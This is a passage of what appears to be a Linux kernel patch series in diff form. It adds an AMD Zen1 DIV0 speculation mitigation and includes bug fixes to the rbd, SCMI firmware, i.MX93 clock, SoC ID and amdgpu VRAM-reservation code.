++#define X86_BUG_DIV0			X86_BUG(1*32 + 1) /* AMD DIV0 speculation bug */
+ #endif /* _ASM_X86_CPUFEATURES_H */
+diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h
+index c13e4ff8ec70c..45bf26862b99b 100644
+--- a/arch/x86/include/asm/processor.h
++++ b/arch/x86/include/asm/processor.h
+@@ -801,10 +801,12 @@ extern u16 get_llc_id(unsigned int cpu);
+ extern u32 amd_get_nodes_per_socket(void);
+ extern u32 amd_get_highest_perf(void);
+ extern bool cpu_has_ibpb_brtype_microcode(void);
++extern void amd_clear_divider(void);
+ #else
+ static inline u32 amd_get_nodes_per_socket(void)	{ return 0; }
+ static inline u32 amd_get_highest_perf(void)		{ return 0; }
+ static inline bool cpu_has_ibpb_brtype_microcode(void)	{ return false; }
++static inline void amd_clear_divider(void)		{ }
+ #endif
+ 
+ #define for_each_possible_hypervisor_cpuid_base(function) \
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index 7f0cf4a959c02..43910eb55b2e9 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -75,6 +75,10 @@ static const int amd_zenbleed[] =
+ 			   AMD_MODEL_RANGE(0x17, 0x60, 0x0, 0x7f, 0xf),
+ 			   AMD_MODEL_RANGE(0x17, 0xa0, 0x0, 0xaf, 0xf));
+ 
++static const int amd_div0[] =
++	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x17, 0x00, 0x0, 0x2f, 0xf),
++			   AMD_MODEL_RANGE(0x17, 0x50, 0x0, 0x5f, 0xf));
++
+ static bool cpu_has_amd_erratum(struct cpuinfo_x86 *cpu, const int *erratum)
+ {
+ 	int osvw_id = *erratum++;
+@@ -1115,6 +1119,11 @@ static void init_amd(struct cpuinfo_x86 *c)
+ 	check_null_seg_clears_base(c);
+ 
+ 	zenbleed_check(c);
++
++	if (cpu_has_amd_erratum(c, amd_div0)) {
++		pr_notice_once("AMD Zen1 DIV0 bug detected. Disable SMT for full protection.\n");
++		setup_force_cpu_bug(X86_BUG_DIV0);
++	}
+ }
+ 
+ #ifdef CONFIG_X86_32
+@@ -1275,3 +1284,13 @@ void amd_check_microcode(void)
+ {
+ 	on_each_cpu(zenbleed_check_cpu, NULL, 1);
+ }
++
++/*
++ * Issue a DIV 0/1 insn to clear any division data from previous DIV
++ * operations.
++ */
++void noinstr amd_clear_divider(void)
++{
++	asm volatile(ALTERNATIVE("", "div %2\n\t", X86_BUG_DIV0)
++		     :: "a" (0), "d" (0), "r" (1));
++}
+diff --git a/arch/x86/kernel/traps.c b/arch/x86/kernel/traps.c
+index c0a5a4f225d9a..7e8795d8b0f17 100644
+--- a/arch/x86/kernel/traps.c
++++ b/arch/x86/kernel/traps.c
+@@ -206,6 +206,8 @@ DEFINE_IDTENTRY(exc_divide_error)
+ {
+ 	do_error_trap(regs, 0, "divide error", X86_TRAP_DE, SIGFPE,
+ 		      FPE_INTDIV, error_get_trap_addr(regs));
++
++	amd_clear_divider();
+ }
+ 
+ DEFINE_IDTENTRY(exc_overflow)
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index daec0321cd76b..74ef3da545361 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -3676,7 +3676,7 @@ static int rbd_lock(struct rbd_device *rbd_dev)
+ 	ret = ceph_cls_lock(osdc, &rbd_dev->header_oid, &rbd_dev->header_oloc,
+ 			    RBD_LOCK_NAME, CEPH_CLS_LOCK_EXCLUSIVE, cookie,
+ 			    RBD_LOCK_TAG, "", 0);
+-	if (ret)
++	if (ret && ret != -EEXIST)
+ 		return ret;
+ 
+ 	__rbd_lock(rbd_dev, cookie);
+@@ -3879,7 +3879,7 @@ static struct ceph_locker *get_lock_owner_info(struct rbd_device *rbd_dev)
+ 				 &rbd_dev->header_oloc, RBD_LOCK_NAME,
+ 				 &lock_type, &lock_tag, &lockers, &num_lockers);
+ 	if (ret) {
+-		rbd_warn(rbd_dev, "failed to retrieve lockers: %d", ret);
++		rbd_warn(rbd_dev, "failed to get header lockers: %d", ret);
+ 		return ERR_PTR(ret);
+ 	}
+ 
+@@ -3941,8 +3941,10 @@ static int find_watcher(struct rbd_device *rbd_dev,
+ 	ret = ceph_osdc_list_watchers(osdc, &rbd_dev->header_oid,
+ 				      &rbd_dev->header_oloc, &watchers,
+ 				      &num_watchers);
+-	if (ret)
++	if (ret) {
++		rbd_warn(rbd_dev, "failed to get watchers: %d", ret);
+ 		return ret;
++	}
+ 
+ 	sscanf(locker->id.cookie, RBD_LOCK_COOKIE_PREFIX " %llu", &cookie);
+ 	for (i = 0; i < num_watchers; i++) {
+@@ -3986,8 +3988,12 @@ static int rbd_try_lock(struct rbd_device *rbd_dev)
+ 		locker = refreshed_locker = NULL;
+ 
+ 		ret = rbd_lock(rbd_dev);
+-		if (ret != -EBUSY)
++		if (!ret)
++			goto out;
++		if (ret != -EBUSY) {
++			rbd_warn(rbd_dev, "failed to lock header: %d", ret);
+ 			goto out;
++		}
+ 
+ 		/* determine if the current lock holder is still alive */
+ 		locker = get_lock_owner_info(rbd_dev);
+@@ -4090,11 +4096,8 @@ static int rbd_try_acquire_lock(struct rbd_device *rbd_dev)
+ 
+ 	ret = rbd_try_lock(rbd_dev);
+ 	if (ret < 0) {
+-		rbd_warn(rbd_dev, "failed to lock header: %d", ret);
+-		if (ret == -EBLOCKLISTED)
+-			goto out;
+-
+-		ret = 1; /* request lock anyway */
++		rbd_warn(rbd_dev, "failed to acquire lock: %d", ret);
++		goto out;
+ 	}
+ 	if (ret > 0) {
+ 		up_write(&rbd_dev->lock_rwsem);
+@@ -6628,12 +6631,11 @@ static int rbd_add_acquire_lock(struct rbd_device *rbd_dev)
+ 		cancel_delayed_work_sync(&rbd_dev->lock_dwork);
+ 		if (!ret)
+ 			ret = -ETIMEDOUT;
+-	}
+ 
+-	if (ret) {
+-		rbd_warn(rbd_dev, "failed to acquire exclusive lock: %ld", ret);
+-		return ret;
++		rbd_warn(rbd_dev, "failed to acquire lock: %ld", ret);
+ 	}
++	if (ret)
++		return ret;
+ 
+ 	/*
+ 	 * The lock may have been released by now, unless automatic lock
+diff --git a/drivers/clk/imx/clk-imx93.c b/drivers/clk/imx/clk-imx93.c
+index 5e3d299190c89..61d9f9bf86e63 100644
+--- a/drivers/clk/imx/clk-imx93.c
++++ b/drivers/clk/imx/clk-imx93.c
+@@ -288,7 +288,7 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 	anatop_base = devm_of_iomap(dev, np, 0, NULL);
+ 	of_node_put(np);
+ 	if (WARN_ON(IS_ERR(anatop_base))) {
+-		ret = PTR_ERR(base);
++		ret = PTR_ERR(anatop_base);
+ 		goto unregister_hws;
+ 	}
+ 
+diff --git a/drivers/firmware/arm_scmi/mailbox.c b/drivers/firmware/arm_scmi/mailbox.c
+index a455f3c0e98b2..25d31dfdad15d 100644
+--- a/drivers/firmware/arm_scmi/mailbox.c
++++ b/drivers/firmware/arm_scmi/mailbox.c
+@@ -106,8 +106,10 @@ static int mailbox_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 		return -ENOMEM;
+ 
+ 	shmem = of_parse_phandle(cdev->of_node, "shmem", idx);
+-	if (!of_device_is_compatible(shmem, "arm,scmi-shmem"))
++	if (!of_device_is_compatible(shmem, "arm,scmi-shmem")) {
++		of_node_put(shmem);
+ 		return -ENXIO;
++	}
+ 
+ 	ret = of_address_to_resource(shmem, 0, &res);
+ 	of_node_put(shmem);
+diff --git a/drivers/firmware/arm_scmi/smc.c b/drivers/firmware/arm_scmi/smc.c
+index 87a7b13cf868b..ac0bd51ef16a2 100644
+--- a/drivers/firmware/arm_scmi/smc.c
++++ b/drivers/firmware/arm_scmi/smc.c
+@@ -23,6 +23,7 @@
+ /**
+  * struct scmi_smc - Structure representing a SCMI smc transport
+  *
++ * @irq: An optional IRQ for completion
+  * @cinfo: SCMI channel info
+  * @shmem: Transmit/Receive shared memory area
+  * @shmem_lock: Lock to protect access to Tx/Rx shared memory area.
+@@ -33,6 +34,7 @@
+  */
+ 
+ struct scmi_smc {
++	int irq;
+ 	struct scmi_chan_info *cinfo;
+ 	struct scmi_shared_mem __iomem *shmem;
+ 	/* Protect access to shmem area */
+@@ -106,7 +108,7 @@ static int smc_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 	struct resource res;
+ 	struct device_node *np;
+ 	u32 func_id;
+-	int ret, irq;
++	int ret;
+ 
+ 	if (!tx)
+ 		return -ENODEV;
+@@ -116,8 +118,10 @@ static int smc_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 		return -ENOMEM;
+ 
+ 	np = of_parse_phandle(cdev->of_node, "shmem", 0);
+-	if (!of_device_is_compatible(np, "arm,scmi-shmem"))
++	if (!of_device_is_compatible(np, "arm,scmi-shmem")) {
++		of_node_put(np);
+ 		return -ENXIO;
++	}
+ 
+ 	ret = of_address_to_resource(np, 0, &res);
+ 	of_node_put(np);
+@@ -142,11 +146,10 @@ static int smc_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 	 * completion of a message is signaled by an interrupt rather than by
+ 	 * the return of the SMC call.
+ 	 */
+-	irq = of_irq_get_byname(cdev->of_node, "a2p");
+-	if (irq > 0) {
+-		ret = devm_request_irq(dev, irq, smc_msg_done_isr,
+-				       IRQF_NO_SUSPEND,
+-				       dev_name(dev), scmi_info);
++	scmi_info->irq = of_irq_get_byname(cdev->of_node, "a2p");
++	if (scmi_info->irq > 0) {
++		ret = request_irq(scmi_info->irq, smc_msg_done_isr,
++				  IRQF_NO_SUSPEND, dev_name(dev), scmi_info);
+ 		if (ret) {
+ 			dev_err(dev, "failed to setup SCMI smc irq\n");
+ 			return ret;
+@@ -168,6 +171,10 @@ static int smc_chan_free(int id, void *p, void *data)
+ 	struct scmi_chan_info *cinfo = p;
+ 	struct scmi_smc *scmi_info = cinfo->transport_info;
+ 
++	/* Ignore any possible further reception on the IRQ path */
++	if (scmi_info->irq > 0)
++		free_irq(scmi_info->irq, scmi_info);
++
+ 	cinfo->transport_info = NULL;
+ 	scmi_info->cinfo = NULL;
+ 
+diff --git a/drivers/firmware/smccc/soc_id.c b/drivers/firmware/smccc/soc_id.c
+index 890eb454599a3..1990263fbba0e 100644
+--- a/drivers/firmware/smccc/soc_id.c
++++ b/drivers/firmware/smccc/soc_id.c
+@@ -34,7 +34,6 @@ static struct soc_device_attribute *soc_dev_attr;
+ 
+ static int __init smccc_soc_init(void)
+ {
+-	struct arm_smccc_res res;
+ 	int soc_id_rev, soc_id_version;
+ 	static char soc_id_str[20], soc_id_rev_str[12];
+ 	static char soc_id_jep106_id_str[12];
+@@ -49,13 +48,13 @@ static int __init smccc_soc_init(void)
+ 	}
+ 
+ 	if (soc_id_version < 0) {
+-		pr_err("ARCH_SOC_ID(0) returned error: %lx\n", res.a0);
++		pr_err("Invalid SoC Version: %x\n", soc_id_version);
+ 		return -EINVAL;
+ 	}
+ 
+ 	soc_id_rev = arm_smccc_get_soc_id_revision();
+ 	if (soc_id_rev < 0) {
+-		pr_err("ARCH_SOC_ID(1) returned error: %lx\n", res.a0);
++		pr_err("Invalid SoC Revision: %x\n", soc_id_rev);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
+index b81b77a9efa61..9b97fa39d47a2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
+@@ -101,39 +101,97 @@ void amdgpu_atomfirmware_scratch_regs_init(struct amdgpu_device *adev)
+ 	}
+ }
+ 
++static int amdgpu_atomfirmware_allocate_fb_v2_1(struct amdgpu_device *adev,
++	struct vram_usagebyfirmware_v2_1 *fw_usage, int *usage_bytes)
++{
++	uint32_t start_addr, fw_size, drv_size;
++
++	start_addr = le32_to_cpu(fw_usage->start_address_in_kb);
++	fw_size = le16_to_cpu(fw_usage->used_by_firmware_in_kb);
++	drv_size = le16_to_cpu(fw_usage->used_by_driver_in_kb);
++
++	DRM_DEBUG("atom firmware v2_1 requested %08x %dkb fw %dkb drv\n",
++			  start_addr,
++			  fw_size,
++			  drv_size);
++
++	if ((start_addr & ATOM_VRAM_OPERATION_FLAGS_MASK) ==
++		(uint32_t)(ATOM_VRAM_BLOCK_SRIOV_MSG_SHARE_RESERVATION <<
++		ATOM_VRAM_OPERATION_FLAGS_SHIFT)) {
++		/* Firmware request VRAM reservation for SR-IOV */
++		adev->mman.fw_vram_usage_start_offset = (start_addr &
++			(~ATOM_VRAM_OPERATION_FLAGS_MASK)) << 10;
++		adev->mman.fw_vram_usage_size = fw_size << 10;
++		/* Use the default scratch size */
++		*usage_bytes = 0;
++	} else {
++		*usage_bytes = drv_size << 10;
++	}
++	return 0;
++}
++
++static int amdgpu_atomfirmware_allocate_fb_v2_2(struct amdgpu_device *adev,
++		struct vram_usagebyfirmware_v2_2 *fw_usage, int *usage_bytes)
++{
++	uint32_t fw_start_addr, fw_size, drv_start_addr, drv_size;
++
++	fw_start_addr = le32_to_cpu(fw_usage->fw_region_start_address_in_kb);
++	fw_size = le16_to_cpu(fw_usage->used_by_firmware_in_kb);
++
++	drv_start_addr = le32_to_cpu(fw_usage->driver_region0_start_address_in_kb);
++	drv_size = le32_to_cpu(fw_usage->used_by_driver_region0_in_kb);
++
++	DRM_DEBUG("atom requested fw start at %08x %dkb and drv start at %08x %dkb\n",
++			  fw_start_addr,
++			  fw_size,
++			  drv_start_addr,
++			  drv_size);
++
++	if ((fw_start_addr & (ATOM_VRAM_BLOCK_NEEDS_NO_RESERVATION << 30)) == 0) {
++		/* Firmware request VRAM reservation for SR-IOV */
++		adev->mman.fw_vram_usage_start_offset = (fw_start_addr &
++			(~ATOM_VRAM_OPERATION_FLAGS_MASK)) << 10;
++		adev->mman.fw_vram_usage_size = fw_size << 10;
++	}
++
++	if ((drv_start_addr & (ATOM_VRAM_BLOCK_NEEDS_NO_RESERVATION << 30)) == 0) {
++		/* driver request VRAM reservation for SR-IOV */
++		adev->mman.drv_vram_usage_start_offset = (drv_start_addr &
++			(~ATOM_VRAM_OPERATION_FLAGS_MASK)) << 10;
++		adev->mman.drv_vram_usage_size = drv_size << 10;
++	}
++
++	*usage_bytes = 0;
++	return 0;
++}
++
+ int amdgpu_atomfirmware_allocate_fb_scratch(struct amdgpu_device *adev)
+ {
+ 	struct atom_context *ctx = adev->mode_info.atom_context;
+ 	int index = get_index_into_master_table(atom_master_list_of_data_tables_v2_1,
+ 						vram_usagebyfirmware);
+-	struct vram_usagebyfirmware_v2_1 *firmware_usage;
+-	uint32_t start_addr, size;
++	struct vram_usagebyfirmware_v2_1 *fw_usage_v2_1;
++	struct vram_usagebyfirmware_v2_2 *fw_usage_v2_2;
+ 	uint16_t data_offset;
++	uint8_t frev, crev;
+ 	int usage_bytes = 0;
+ 
+-	if (amdgpu_atom_parse_data_header(ctx, index, NULL, NULL, NULL, &data_offset)) {
+-		firmware_usage = (struct vram_usagebyfirmware_v2_1 *)(ctx->bios + data_offset);
+-		DRM_DEBUG("atom firmware requested %08x %dkb fw %dkb drv\n",
+-			  le32_to_cpu(firmware_usage->start_address_in_kb),
+-			  le16_to_cpu(firmware_usage->used_by_firmware_in_kb),
+-			  le16_to_cpu(firmware_usage->used_by_driver_in_kb));
+-
+-		start_addr = le32_to_cpu(firmware_usage->start_address_in_kb);
+-		size = le16_to_cpu(firmware_usage->used_by_firmware_in_kb);
+-
+-		if ((uint32_t)(start_addr & ATOM_VRAM_OPERATION_FLAGS_MASK) ==
+-			(uint32_t)(ATOM_VRAM_BLOCK_SRIOV_MSG_SHARE_RESERVATION <<
+-			ATOM_VRAM_OPERATION_FLAGS_SHIFT)) {
+-			/* Firmware request VRAM reservation for SR-IOV */
+-			adev->mman.fw_vram_usage_start_offset = (start_addr &
+-				(~ATOM_VRAM_OPERATION_FLAGS_MASK)) << 10;
+-			adev->mman.fw_vram_usage_size = size << 10;
+-			/* Use the default scratch size */
+-			usage_bytes = 0;
+-		} else {
+-			usage_bytes = le16_to_cpu(firmware_usage->used_by_driver_in_kb) << 10;
++	if (amdgpu_atom_parse_data_header(ctx, index, NULL, &frev, &crev, &data_offset)) {
++		if (frev == 2 && crev == 1) {
++			fw_usage_v2_1 =
++				(struct vram_usagebyfirmware_v2_1 *)(ctx->bios + data_offset);
++			amdgpu_atomfirmware_allocate_fb_v2_1(adev,
++					fw_usage_v2_1,
++					&usage_bytes);
++		} else if (frev >= 2 && crev >= 2) {
++			fw_usage_v2_2 =
++				(struct vram_usagebyfirmware_v2_2 *)(ctx->bios + data_offset);
++			amdgpu_atomfirmware_allocate_fb_v2_2(adev,
++					fw_usage_v2_2,
++					&usage_bytes);
+ 		}
+ 	}
++
+ 	ctx->scratch_size_bytes = 0;
+ 	if (usage_bytes == 0)
+ 		usage_bytes = 20 * 1024;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index ad8cb9e6d1ab0..0ee7c935fba1f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -347,17 +347,16 @@ int amdgpu_bo_create_kernel(struct amdgpu_device *adev,
+  * @adev: amdgpu device object
+  * @offset: offset of the BO
+  * @size: size of the BO
+- * @domain: where to place it
+  * @bo_ptr:  used to initialize BOs in structures
+  * @cpu_addr: optional CPU address mapping
+  *
+- * Creates a kernel BO at a specific offset in the address space of the domain.
++ * Creates a kernel BO at a specific offset in VRAM.
+  *
+  * Returns:
+  * 0 on success, negative error code otherwise.
+  */
+ int amdgpu_bo_create_kernel_at(struct amdgpu_device *adev,
+-			       uint64_t offset, uint64_t size, uint32_t domain,
++			       uint64_t offset, uint64_t size,
+ 			       struct amdgpu_bo **bo_ptr, void **cpu_addr)
+ {
+ 	struct ttm_operation_ctx ctx = { false, false };
+@@ -367,8 +366,9 @@ int amdgpu_bo_create_kernel_at(struct amdgpu_device *adev,
+ 	offset &= PAGE_MASK;
+ 	size = ALIGN(size, PAGE_SIZE);
+ 
+-	r = amdgpu_bo_create_reserved(adev, size, PAGE_SIZE, domain, bo_ptr,
+-				      NULL, cpu_addr);
++	r = amdgpu_bo_create_reserved(adev, size, PAGE_SIZE,
++				      AMDGPU_GEM_DOMAIN_VRAM, bo_ptr, NULL,
++				      cpu_addr);
+ 	if (r)
+ 		return r;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+index 147b79c10cbb6..93207badf83f3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+@@ -284,7 +284,7 @@ int amdgpu_bo_create_kernel(struct amdgpu_device *adev,
+ 			    u32 domain, struct amdgpu_bo **bo_ptr,
+ 			    u64 *gpu_addr, void **cpu_addr);
+ int amdgpu_bo_create_kernel_at(struct amdgpu_device *adev,
+-			       uint64_t offset, uint64_t size, uint32_t domain,
++			       uint64_t offset, uint64_t size,
+ 			       struct amdgpu_bo **bo_ptr, void **cpu_addr);
+ int amdgpu_bo_create_user(struct amdgpu_device *adev,
+ 			  struct amdgpu_bo_param *bp,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+index b64938ed8cb68..10469f20a10ca 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+@@ -1537,6 +1537,23 @@ static void amdgpu_ttm_fw_reserve_vram_fini(struct amdgpu_device *adev)
+ 		NULL, &adev->mman.fw_vram_usage_va);
+ }
+ 
++/*
++ * Driver Reservation functions
++ */
++/**
++ * amdgpu_ttm_drv_reserve_vram_fini - free drv reserved vram
++ *
++ * @adev: amdgpu_device pointer
++ *
++ * free drv reserved vram if it has been reserved.
++ */
++static void amdgpu_ttm_drv_reserve_vram_fini(struct amdgpu_device *adev)
++{
++	amdgpu_bo_free_kernel(&adev->mman.drv_vram_usage_reserved_bo,
++						  NULL,
++						  NULL);
++}
++
+ /**
+  * amdgpu_ttm_fw_reserve_vram_init - create bo vram reservation from fw
+  *
+@@ -1558,11 +1575,34 @@ static int amdgpu_ttm_fw_reserve_vram_init(struct amdgpu_device *adev)
+ 	return amdgpu_bo_create_kernel_at(adev,
+ 					  adev->mman.fw_vram_usage_start_offset,
+ 					  adev->mman.fw_vram_usage_size,
+-					  AMDGPU_GEM_DOMAIN_VRAM,
+ 					  &adev->mman.fw_vram_usage_reserved_bo,
+ 					  &adev->mman.fw_vram_usage_va);
+ }
+ 
++/**
++ * amdgpu_ttm_drv_reserve_vram_init - create bo vram reservation from driver
++ *
++ * @adev: amdgpu_device pointer
++ *
++ * create bo vram reservation from drv.
++ */
++static int amdgpu_ttm_drv_reserve_vram_init(struct amdgpu_device *adev)
++{
++	uint64_t vram_size = adev->gmc.visible_vram_size;
++
++	adev->mman.drv_vram_usage_reserved_bo = NULL;
++
++	if (adev->mman.drv_vram_usage_size == 0 ||
++	    adev->mman.drv_vram_usage_size > vram_size)
++		return 0;
++
++	return amdgpu_bo_create_kernel_at(adev,
++					  adev->mman.drv_vram_usage_start_offset,
++					  adev->mman.drv_vram_usage_size,
++					  &adev->mman.drv_vram_usage_reserved_bo,
++					  NULL);
++}
++
+ /*
+  * Memoy training reservation functions
+  */
+@@ -1585,14 +1625,15 @@ static int amdgpu_ttm_training_reserve_vram_fini(struct amdgpu_device *adev)
+ 	return 0;
+ }
+ 
+-static void amdgpu_ttm_training_data_block_init(struct amdgpu_device *adev)
++static void amdgpu_ttm_training_data_block_init(struct amdgpu_device *adev,
++						uint32_t reserve_size)
+ {
+ 	struct psp_memory_training_context *ctx = &adev->psp.mem_train_ctx;
+ 
+ 	memset(ctx, 0, sizeof(*ctx));
+ 
+ 	ctx->c2p_train_data_offset =
+-		ALIGN((adev->gmc.mc_vram_size - adev->mman.discovery_tmr_size - SZ_1M), SZ_1M);
++		ALIGN((adev->gmc.mc_vram_size - reserve_size - SZ_1M), SZ_1M);
+ 	ctx->p2c_train_data_offset =
+ 		(adev->gmc.mc_vram_size - GDDR6_MEM_TRAINING_OFFSET);
+ 	ctx->train_data_size =
+@@ -1610,9 +1651,10 @@ static void amdgpu_ttm_training_data_block_init(struct amdgpu_device *adev)
+  */
+ static int amdgpu_ttm_reserve_tmr(struct amdgpu_device *adev)
+ {
+-	int ret;
+ 	struct psp_memory_training_context *ctx = &adev->psp.mem_train_ctx;
+ 	bool mem_train_support = false;
++	uint32_t reserve_size = 0;
++	int ret;
+ 
+ 	if (!amdgpu_sriov_vf(adev)) {
+ 		if (amdgpu_atomfirmware_mem_training_supported(adev))
+@@ -1628,18 +1670,18 @@ static int amdgpu_ttm_reserve_tmr(struct amdgpu_device *adev)
+ 	 * Otherwise, fallback to legacy approach to check and reserve tmr block for ip
+ 	 * discovery data and G6 memory training data respectively
+ 	 */
+-	adev->mman.discovery_tmr_size =
+-		amdgpu_atomfirmware_get_fw_reserved_fb_size(adev);
+-	if (!adev->mman.discovery_tmr_size)
+-		adev->mman.discovery_tmr_size = DISCOVERY_TMR_OFFSET;
++	if (adev->bios)
++		reserve_size =
++			amdgpu_atomfirmware_get_fw_reserved_fb_size(adev);
++	if (!reserve_size)
++		reserve_size = DISCOVERY_TMR_OFFSET;
+ 
+ 	if (mem_train_support) {
+ 		/* reserve vram for mem train according to TMR location */
+-		amdgpu_ttm_training_data_block_init(adev);
++		amdgpu_ttm_training_data_block_init(adev, reserve_size);
+ 		ret = amdgpu_bo_create_kernel_at(adev,
+ 					 ctx->c2p_train_data_offset,
+ 					 ctx->train_data_size,
+-					 AMDGPU_GEM_DOMAIN_VRAM,
+ 					 &ctx->c2p_bo,
+ 					 NULL);
+ 		if (ret) {
+@@ -1651,14 +1693,14 @@ static int amdgpu_ttm_reserve_tmr(struct amdgpu_device *adev)
+ 	}
+ 
+ 	ret = amdgpu_bo_create_kernel_at(adev,
+-				adev->gmc.real_vram_size - adev->mman.discovery_tmr_size,
+-				adev->mman.discovery_tmr_size,
+-				AMDGPU_GEM_DOMAIN_VRAM,
+-				&adev->mman.discovery_memory,
++				adev->gmc.real_vram_size - reserve_size,
++				reserve_size,
++				&adev->mman.fw_reserved_memory,
+ 				NULL);
+ 	if (ret) {
+ 		DRM_ERROR("alloc tmr failed(%d)!\n", ret);
+-		amdgpu_bo_free_kernel(&adev->mman.discovery_memory, NULL, NULL);
++		amdgpu_bo_free_kernel(&adev->mman.fw_reserved_memory,
++				      NULL, NULL);
+ 		return ret;
+ 	}
+ 
+@@ -1730,6 +1772,14 @@ int amdgpu_ttm_init(struct amdgpu_device *adev)
+ 		return r;
+ 	}
+ 
++	/*
++	 *The reserved vram for driver must be pinned to the specified
++	 *place on the VRAM, so reserve it early.
++	 */
++	r = amdgpu_ttm_drv_reserve_vram_init(adev);
++	if (r)
++		return r;
++
+ 	/*
+ 	 * only NAVI10 and onwards ASIC support for IP discovery.
+ 	 * If IP discovery enabled, a block of memory should be
+@@ -1746,21 +1796,18 @@ int amdgpu_ttm_init(struct amdgpu_device *adev)
+ 	 * avoid display artifacts while transitioning between pre-OS
+ 	 * and driver.  */
+ 	r = amdgpu_bo_create_kernel_at(adev, 0, adev->mman.stolen_vga_size,
+-				       AMDGPU_GEM_DOMAIN_VRAM,
+ 				       &adev->mman.stolen_vga_memory,
+ 				       NULL);
+ 	if (r)
+ 		return r;
+ 	r = amdgpu_bo_create_kernel_at(adev, adev->mman.stolen_vga_size,
+ 				       adev->mman.stolen_extended_size,
+-				       AMDGPU_GEM_DOMAIN_VRAM,
+ 				       &adev->mman.stolen_extended_memory,
+ 				       NULL);
+ 	if (r)
+ 		return r;
+ 	r = amdgpu_bo_create_kernel_at(adev, adev->mman.stolen_reserved_offset,
+ 				       adev->mman.stolen_reserved_size,
+-				       AMDGPU_GEM_DOMAIN_VRAM,
+ 				       &adev->mman.stolen_reserved_memory,
+ 				       NULL);
+ 	if (r)
+@@ -1847,14 +1894,16 @@ void amdgpu_ttm_fini(struct amdgpu_device *adev)
+ 	/* return the stolen vga memory back to VRAM */
+ 	amdgpu_bo_free_kernel(&adev->mman.stolen_vga_memory, NULL, NULL);
+ 	amdgpu_bo_free_kernel(&adev->mman.stolen_extended_memory, NULL, NULL);
+-	/* return the IP Discovery TMR memory back to VRAM */
+-	amdgpu_bo_free_kernel(&adev->mman.discovery_memory, NULL, NULL);
++	/* return the FW reserved memory back to VRAM */
++	amdgpu_bo_free_kernel(&adev->mman.fw_reserved_memory, NULL,
++			      NULL);
+ 	if (adev->mman.stolen_reserved_size)
+ 		amdgpu_bo_free_kernel(&adev->mman.stolen_reserved_memory,
+ 				      NULL, NULL);
+ 	amdgpu_bo_free_kernel(&adev->mman.sdma_access_bo, NULL,
+ 					&adev->mman.sdma_access_ptr);
+ 	amdgpu_ttm_fw_reserve_vram_fini(adev);
++	amdgpu_ttm_drv_reserve_vram_fini(adev);
+ 
+ 	if (drm_dev_enter(adev_to_drm(adev), &idx)) {
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.h
+index a37207011a69a..0fefa5e3a524b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.h
+@@ -78,7 +78,8 @@ struct amdgpu_mman {
+ 	/* discovery */
+ 	uint8_t				*discovery_bin;
+ 	uint32_t			discovery_tmr_size;
+-	struct amdgpu_bo		*discovery_memory;
++	/* fw reserved memory */
++	struct amdgpu_bo		*fw_reserved_memory;
+ 
+ 	/* firmware VRAM reservation */
+ 	u64		fw_vram_usage_start_offset;
+@@ -86,6 +87,11 @@ struct amdgpu_mman {
+ 	struct amdgpu_bo	*fw_vram_usage_reserved_bo;
+ 	void		*fw_vram_usage_va;
+ 
++	/* driver VRAM reservation */
++	u64		drv_vram_usage_start_offset;
++	u64		drv_vram_usage_size;
++	struct amdgpu_bo	*drv_vram_usage_reserved_bo;
++
+ 	/* PAGE_SIZE'd BO for process memory r/w over SDMA. */
+ 	struct amdgpu_bo	*sdma_access_bo;
+ 	void			*sdma_access_ptr;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+index c73abe54d9747..81549f1edfe01 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+@@ -391,7 +391,6 @@ static void amdgpu_virt_ras_reserve_bps(struct amdgpu_device *adev)
+ 		 */
+ 		if (amdgpu_bo_create_kernel_at(adev, bp << AMDGPU_GPU_PAGE_SHIFT,
+ 					       AMDGPU_GPU_PAGE_SIZE,
+-					       AMDGPU_GEM_DOMAIN_VRAM,
+ 					       &bo, NULL))
+ 			DRM_DEBUG("RAS WARN: reserve vram for retired page %llx fail\n", bp);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 9b2915764306b..86e07cc1d3dcc 100644
